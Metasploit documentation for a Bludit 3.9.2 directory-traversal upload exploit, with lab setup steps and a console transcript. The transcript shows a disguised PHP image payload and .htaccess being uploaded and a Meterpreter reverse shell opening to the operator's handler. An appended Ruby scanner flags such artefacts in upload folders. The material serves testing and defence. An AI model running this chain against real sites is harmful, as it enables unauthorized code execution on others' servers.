metasploit-gs/documentation/modules/exploit/linux/http/bludit_upload_images_exec.md
2019-11-11 14:47:56 -06:00


Bludit Directory Traversal Image File Upload Vulnerability

Description

This module exploits a vulnerability in Bludit, a simple, fast, "secure", flat-file CMS. The vulnerability, found by christasa, is in the image uploading feature. A remote user could abuse the uuid parameter of the upload feature to save a malicious payload anywhere on the server, then use a custom .htaccess file to bypass the file extension check, and finally get remote code execution.

Setup

  1. Set up an Ubuntu box with Apache, PHP, and MySQL.
  2. Download: https://www.bludit.com/releases/bludit-3-9-2.zip
  3. Follow the installation guide here. Make sure your Apache server sets AllowOverride All in /etc/apache2/apache2.conf.

Scenarios

msf5 exploit(linux/http/bludit_upload_images_exec) > check
[*] 172.16.135.162:80 - The service is running, but could not be validated.
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading qGkVsmahdK.png...
[*] Uploading .htaccess...
[*] Executing qGkVsmahdK.png...
[*] Sending stage (38288 bytes) to 172.16.135.162
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.162:47086) at 2019-11-05 08:54:34 -0600
[+] Deleted .htaccess
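
A defender-side check for the two on-disk artefacts of the technique described on this page: an .htaccess file where none is expected, and a file with an image extension whose content is not an image. This is an added example, not part of the module or its documentation; the function names, the allowlist parameter and the sample directory tree are assumptions made for illustration.

```ruby
require 'find'
require 'tmpdir'
require 'fileutils'

# Leading bytes of the image types an upload directory is expected to hold.
IMAGE_MAGIC = {
  '.png'  => ["\x89PNG\r\n\x1A\n".b],
  '.jpg'  => ["\xFF\xD8\xFF".b],
  '.jpeg' => ["\xFF\xD8\xFF".b],
  '.gif'  => ['GIF87a'.b, 'GIF89a'.b]
}.freeze

# Return sorted [relative_path, reason] pairs for suspicious files under root.
# allowed_htaccess (hypothetical parameter) lists expected .htaccess paths
# relative to root. Only the first 4 KiB of each image file is inspected.
def audit_upload_tree(root, allowed_htaccess: [])
  findings = []
  Find.find(root) do |path|
    next unless File.file?(path)
    rel  = path.delete_prefix(root).sub(%r{\A/+}, '')
    name = File.basename(path)
    if name == '.htaccess'
      findings << [rel, 'unexpected .htaccess'] unless allowed_htaccess.include?(rel)
      next
    end
    magics = IMAGE_MAGIC[File.extname(name).downcase]
    next unless magics
    data = File.binread(path, 4096) || ''.b
    if magics.none? { |m| data.start_with?(m) }
      findings << [rel, 'image extension without image header']
    elsif data.include?('<?php'.b)
      findings << [rel, 'image header followed by PHP open tag']
    end
  end
  findings.sort
end

# Constructed sample tree (directory and file names are made up, not from the page).
def demo_findings
  Dir.mktmpdir do |root|
    dir = File.join(root, 'uploads/pages/abc')
    FileUtils.mkdir_p(dir)
    File.binwrite(File.join(root, '.htaccess'), "# site rules\n")
    File.binwrite(File.join(dir, 'ok.png'), "\x89PNG\r\n\x1A\n".b + ("\x00".b * 16))
    File.binwrite(File.join(dir, 'odd.png'), '<?php /* constructed */ ?>')
    File.binwrite(File.join(dir, '.htaccess'), "# constructed\n")
    audit_upload_tree(root, allowed_htaccess: ['.htaccess'])
  end
end
```

In the sample tree the top-level .htaccess is allowlisted and ok.png passes, while the .htaccess inside the upload directory and odd.png are reported.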